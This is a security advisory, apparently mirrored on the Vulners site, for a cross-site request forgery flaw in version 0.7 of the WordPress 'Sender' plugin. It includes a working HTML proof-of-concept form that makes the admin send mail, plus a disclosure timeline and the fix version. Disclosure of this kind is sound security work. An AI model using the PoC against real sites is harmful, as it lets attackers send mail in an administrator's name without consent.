`Plugin Name : Sender A8-Cross-Site_Request_Forgery_(CSRF)
Effected Version : 0.7 (and most probably lower version's if any)
Vulnerability : A8-Cross-Site Request Forgery (CSRF)
Identified by : Madhu Akula
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
POC for Sending mail :
<html>
<body>
<form action=âhttp://localhost/wp-admin/admin.php?page=sndr_send_userâ method=âPOSTâ>
<input type=âhiddenâ name=âsndr_user_name[subscriber]â value=â1âł />
<input type=âhiddenâ name=âsndr_subjectâ value=âtestâ />
<input type=âhiddenâ name=âsndr_contentâ value=âtestâ />
<input type=âsubmitâ value=âSubmit requestâ />
</form>
</body>
</html>
Impact : we can send mail to any one on behalf of the admin
Fixed in : 0.8
http://wordpress.org/plugins/sender/changelog/
Disclosure Timeline
Vendor Contacted : 2014-08-04
Plugin Status : Updated on 2014-08-07
Public Disclosure : October 3, 2015
CVE Number : Not assigned yet
Plugin Description :
This plugin allows you send mails to all users or to certain categories of users via several clicks. To send letters, you can use the php functions such as sending emails, wordpress functions, or send an email through the SMTP server. Also, the plugin provides a bulk mailing for a certain period of time.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation